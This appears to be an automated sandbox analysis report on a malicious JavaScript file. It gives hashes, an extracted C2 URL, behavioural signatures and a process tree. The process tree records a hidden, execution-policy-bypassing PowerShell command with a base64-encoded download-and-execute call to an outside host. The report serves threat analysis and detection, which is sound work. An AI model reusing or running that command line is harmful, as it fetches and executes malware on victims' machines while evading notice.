Analysis
-
max time kernel
10s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
06/01/2024, 10:49
Static task
static1
Behavioral task
behavioral1
Sample
3c487b545bc3b424508f6e2da2613135.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3c487b545bc3b424508f6e2da2613135.js
Resource
win10v2004-20231215-en
General
-
Target
3c487b545bc3b424508f6e2da2613135.js
-
Size
346KB
-
MD5
3c487b545bc3b424508f6e2da2613135
-
SHA1
a32f1f89f43feb28af8b47e325618b4c0b221a4c
-
SHA256
0d0a3c5af67c360abe04e875b1c1592c3490465b9a34dedfa33189bc0dd0fcdd
-
SHA512
3cbd3c157d35f8444832f3db93a087c4c95c05e5a4fc5048bf8bb2a8db4106a666b932a8ebf332f81bf70db86e00229e23f20ad5c1b6a0d31aee997a2713a233
-
SSDEEP
6144:0Xt/0DXYqynVJRFo5equFDq0xw+2i3/hiLNIgVGosimVwi:0Xt8DozVku5xjV68r
Malware Config
Extracted
https://jolantagraban.pl/log/57843441668980/dll/assistant.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2360 2172 wscript.exe 30 PID 2172 wrote to memory of 2360 2172 wscript.exe 30 PID 2172 wrote to memory of 2360 2172 wscript.exe 30 PID 2360 wrote to memory of 2712 2360 cmd.exe 28 PID 2360 wrote to memory of 2712 2360 cmd.exe 28 PID 2360 wrote to memory of 2712 2360 cmd.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3c487b545bc3b424508f6e2da2613135.js1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==1⤵PID:2712